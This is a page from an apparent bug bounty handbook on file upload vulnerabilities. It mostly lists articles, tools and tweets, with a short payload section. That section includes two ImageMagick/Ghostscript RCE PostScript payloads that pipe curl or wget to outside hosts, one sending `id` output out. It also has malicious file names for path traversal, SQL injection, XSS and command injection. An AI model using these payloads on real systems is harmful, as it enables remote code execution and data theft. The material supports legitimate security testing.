Bug Hunter Handbook
  • Introduction
  • Getting Started in InfoSec and Bug Bounties.
  • Presentations
  • Checklists / Guides
  • Useful Twitter Threads
  • List of Vulnerabilities
    • Recon and OSINT
      • Recon
      • Sensitive information using Github
      • Subdomain Enumeration
        • Resolvers
      • Javascript Enumeration
      • After Recon
      • Finding Information Using Public Resources
      • OSINT
      • Cloud
      • Wayback
      • Parameter / Content Discovery
      • Broken Link Highjacking
    • Host Header
    • Injection
      • Other Injection
    • DNS Rebinding
    • Cross Site Scripting (XSS)
      • Weaponizing XSS
      • WAF Bypass
    • Cross Origin Resource Sharing (CORS)
    • Local / Remote File Inclusion (LFI / RFI)
    • Server Side Request Forgery (SSRF)
    • Remote Code Execution (RCE)
    • XML Entity Injecton (XXE)
    • Price Manipulation
    • Directory / Path Traversal
    • Cross Site Request Forgery (CSRF)
      • JSON CSRF
    • Password Reset
    • Login Page Issues
    • Deserialization Attacks
    • File Upload
    • Account Takeover
    • Insecure Direct Object References (IDOR)
    • Open Redirect
    • Business Logic Flaws
    • Rate Limit Bypass / 2FA / OTP Bypass
    • Ruby on Rails
      • Mass Assginment
    • S3 Bucket
    • Race Condition
    • CRLF
    • SSTI
    • Prototype Pollution
  • Approach
  • API Security
  • Mobile Security
  • Fuzzing / Wordlists
  • BugBounty Short Write-ups
  • Burp Suite Tips and Tricks
  • HackerOne Reports
  • Response Manipulation
  • Client Vs Server Side Vulnerabilities
  • DevSecOps
  • Containers
    • Docker
    • Kubernetes
    • Containers
  • AWS
  • Azure
  • Others
    • Code Review
    • Web Sockets
    • Web Cache
    • HTTP Desync Attacks
    • Zone Transfer
    • CSP Bypass
    • Payment Bypasses
    • Http Parameter Pollution
    • Postmessage
    • Others
    • GraphQL
    • Unix / Linux
    • Email Related
    • Dependency confusion
    • Nginx Misconfigs
    • JIRA
    • OAUTH
  • Chaining of Bugs
  • Bug Bounty Automation
  • Mindmaps
  • Oneliner Collections
  • Red Teaming
  • Blue Teamining
  • Recon One Liners
  • Misc
  • Wordpress
  • Fuzzing / FuFF
  • OWASP ZAP
  • Bug List
  • Setting up burp collaborator
  • Admin Panel PwN
  • Credential Stuffing / Dump / HaveibeenPwned?
  • Tools Required
  • Nuclei Template
  • Other BugBounty Repos / Tips
  • Interview
  • Threat Modelling
  • AppSec
Powered by GitBook
On this page

Was this helpful?

  1. List of Vulnerabilities

File Upload

PreviousDeserialization AttacksNextAccount Takeover

Last updated 3 years ago

Was this helpful?

Blogs / Articles:

Writeups:

Tools:

Cheatsheets:

Payloads:

Imagemagick RCE:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice 
putdeviceprops


%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice 
putdeviceprops

Tweets:

Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections

Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*

Burp Suite Extension -

https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a
https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/
https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a
https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/
https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://link.medium.com/fRfag0byB3
https://link.medium.com/6qTQZwayB3
https://link.medium.com/jFGhtvbyB3
Upload Scanner
https://github.com/almandin/fuxploider
https://github.com/ptoomey3/evilarc
https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md
LogoFile upload tricks and checklist
https://twitter.com/hunter0x7/status/1346397333072846848?s=20
https://twitter.com/HolyBugx/status/1348928810620743682?s=20